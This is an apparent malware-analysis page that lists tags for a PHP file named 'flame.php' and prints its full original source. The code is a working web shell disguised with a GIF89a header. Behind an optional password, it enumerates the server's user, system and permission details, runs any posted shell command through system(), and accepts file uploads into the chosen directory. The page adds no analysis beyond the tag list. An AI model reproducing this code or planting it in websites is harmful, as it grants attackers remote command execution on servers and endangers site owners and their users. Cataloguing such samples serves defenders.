PHP Malware Analysis

Back to list

Filename: flame.php

Tags

Encoding
  • base64_decode
Emails
  • mailer@testl.com
Title
  • ..:: ::..
Execution
  • system
  • exec
Input
  • _POST
  • _FILES
Environment
  • getcwd

Deobfuscated code

No debofuscation yet...

Original code

GIF89a???????????!?????,???????D?;?
<b><?php
	
@session_start();
$create_password = false
$password = base64_decode("ZG9kb25r");$pass=$_POST['pass'];if($pass==$password){$_SESSION['mailer']="$pass";}
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);
if($create_password==true){
if(!isset($_SESSION['mailer']) or $_SESSION['mailer']!=$password){
die("<title>..::  ::..</title>
<META http-equiv=\"content-type\" content=\"text/html;charset=iso-8859-1\">
<META content=\"mailer\" name=\"author\">
<META name=\"rating\" content=\"general\" />
<META http-equiv=\"pragma\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"must-revalidate\" />
<META http-equiv=\"cache-control\" content=\"proxy-revalidate\" />
<META name=\"MSSmartTagsPreventParsing\" content=\"true\" />
<META name=\"robots\" content=\"all,index,follow\" />
<META name=\"googlebot\" content=\"all,index,follow\" />
<META name=\"allow-search\" content=\"yes\" />
<META name=\"audience\" content=\"all\" />
<META name=\"revisit\" content=\"2 days\" />
<META name=\"revisit-after\" content=\"2 days\" />
<META name=\"author\" content=\"mailer\" />
<META name=\"copyright\" content=\"mailer\" />
<META name=\"creator\" content=\"mailer\" />
<META name=\"generator\" content=\"mailer\" />
<META http-equiv=\"Reply-to\" content=\"mailer@testl.com\" />
<META name=\"distribution\" content=\"global\" />
<META name=\"classification\" content=\"..:: BraIn  Inc™ `09 ::.., Powered by mailer\" />
<META name=\"document-classification\" content=\"general\" />
<META name=\"rating\" content=\"general\" />
<meta name=\"description\" content=\"..:: BraIn  Inc™ `09 ::.. Powered by mailer\" />
<META content=\"index, follow\" name=\"robots\">
<META content=\"..:: BraIn  Inc™ `09 ::..,mailer\" name=\"keywords\">
<META name=\"dc.title\" content=\"..:: BraIn  Inc™ `09 ::..\" />
<META name=\"dc.creator.e-mail\" content=\"mailer@testl.com\" />
<META name=\"dc.creator.name\" content=\"mailer\" />
<body text=\"#FFFFFF\" bgcolor=\"#000000\" background=\"black\">
<br><br><br><br><br><br><br><br><br><br><br><center>
<table width=100 bgcolor=\"black\" border=1 bordercolor=\"white\"><tr><td>
<font size=1 face=verdana><center><b><font color=red>
..:: BraIn secure Shell ::..</font></a><br><br></b></center>
<form method=post>Password:<br><input type=password name=pass size=30 tabindex=1>
</form><font color=red><b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
<font color=red><b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
<font color=red><b>Your ip:</b> ".$ip."</td></tr></table>");}}


  closelog( );
  $user = get_current_user( );
  $login = posix_getuid( );
  $euid = posix_geteuid( );
  $ver = phpversion( );
  $gid = posix_getgid( );
  if ($chdir == "") $chdir = getcwd( );
  if(!$whoami)$whoami=exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
  $uname = posix_uname( );
  while (list($info, $value) = each ($uname)) {
?>
  <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b><span style="font-size: 9pt"><?= $info ?>
      <span style="font-size: 9pt">:</b> <?= $value ?></span></DIV></TD>
  </TR>
<?php
  }
?>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= 

$gid ?>(<?= $whoami?>)</span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Current Path:</b> <?= $chdir ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>
    </span></DIV></TD>
  </TR>  
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
    </span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
    </span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Script Current User:</b> <?= $user ?></span></DIV></TD>
  </TR>
  <TR>
  <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">PHP Version:</b> <?= $ver ?></span></DIV></TD>
  </TR>
</TABLE>
</b>
</div></font></div>

<?php

#set_magic_quotes_runtime(0);

$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName  = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
    $currentWD = $SCWD;
}

if( $_POST['_act'] == "List files!" ) {
    $currentCMD = "ls -la";
}


print "<form method=post enctype=\"multipart/form-data\"><hr><hr><table>";

print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";

print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";

print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
        print "<center><b>Error while uploading file!</b></center>";
    } else {
        print "<center><pre>";
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "</pre><b>File uploaded successfully!</b></center>";
    }    
} else {
    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
  system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 
/tmp/cmdtemp");
    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
}

exit;

?>